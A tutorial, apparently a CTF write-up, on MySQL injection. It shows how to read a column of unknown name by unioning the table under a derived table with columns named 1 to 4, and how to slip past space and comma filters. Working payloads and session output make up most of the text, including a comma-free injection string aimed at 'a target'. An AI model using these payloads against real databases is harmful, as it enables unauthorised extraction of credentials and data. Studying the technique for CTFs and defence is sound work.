
Bypassing unknown column names in MySQL, explained [MySQL tutorial]

Author: 搜教程    Published: 2019-12-01    Category: MySQL tutorial


This article explains a clever way to bypass unknown column names in MySQL. It gives detailed example code for reference and study and has some value for anyone learning MySQL; if you need it, read on.

Preface

This article covers the fifth DDCTF challenge, a technique for bypassing unknown column names. The steps below were reproduced on a local machine; the idea is neat and easy to follow, so it is shared here. The details follow.

Approach

The challenge filters spaces and commas. Spaces can be replaced by %0a, %0b, %0c, %0d or %a0, or avoided entirely by wrapping expressions in parentheses; commas are avoided by using join (a bare join in MySQL is a cross join), and by writing limit ... offset ... instead of limit N,M.

The name of the column holding the flag is unknown, and information_schema.columns is filtered as well (the hex-encoded table name is blocked too), so the column name cannot be looked up. A union query solves this. The process is:

The idea is to make the flag appear under a column name we do know. A derived table built from (select 1)a,(select 2)b,(select 3)c,(select 4)d has columns literally named 1, 2, 3 and 4; union the target table under it and every row of the target inherits those names, so the unknown fourth column can be addressed as e.4. The only things the attacker has to know are the number of columns and which position holds the flag.

Example session:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
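The session above still uses commas between the derived tables, which the challenge filter would reject. The following is an added example, not part of the original post, that reproduces the trick end to end on a local MySQL instance and then rewrites the final payload so it contains no commas at all. The `user` table layout (id, username, password, email) and its three rows are assumed from the output shown above; the remaining whitespace is left as spaces for readability and would be sent as %0a (or one of the other listed bytes) against the real filter.

```sql
-- Added example (not from the original post). Assumed table layout and
-- sample rows, taken from the session output above.
CREATE TABLE `user` (
  id       INT PRIMARY KEY,
  username VARCHAR(32),
  password VARCHAR(32),
  email    VARCHAR(64)
);
INSERT INTO `user` VALUES (1, 'admin', 'admin888', '110@110.com');
INSERT INTO `user` VALUES (2, 'test',  'test123',  '119@119.com');
INSERT INTO `user` VALUES (3, 'cs',    'cs123',    '120@120.com');

-- Step 1: a template whose column names are the literal texts 1..4.
-- JOIN with no ON clause is a cross join in MySQL, so it replaces the
-- comma between the derived tables.
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;

-- Step 2: UNION the real table under the template. Every row of `user`
-- now carries the names 1..4, so the unknown fourth column is e.4.
-- LIMIT ... OFFSET ... avoids the comma in LIMIT 3,1.
SELECT e.4
FROM (SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
      UNION SELECT * FROM `user`) e
LIMIT 1 OFFSET 3;

-- Step 3: the injected form. The padding columns g, h, i are also glued
-- with JOIN instead of commas; the extracted value lands under `id`.
SELECT * FROM `user` WHERE id = 1
UNION SELECT * FROM
  (SELECT e.4
   FROM (SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
         UNION SELECT * FROM `user`) e
   LIMIT 1 OFFSET 3) f
  JOIN (SELECT 1)g JOIN (SELECT 1)h JOIN (SELECT 1)i;
```

Two things to check before relying on this against a target: the column count of the template must match the target table exactly, or the UNION fails, and the derived table e must not contain duplicate column names, which is why the template uses 1, 2, 3, 4 rather than four copies of the same literal. The bare e.4 reference is MySQL-specific syntax (a digit-only identifier is accepted after the dot); other engines need the name quoted.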
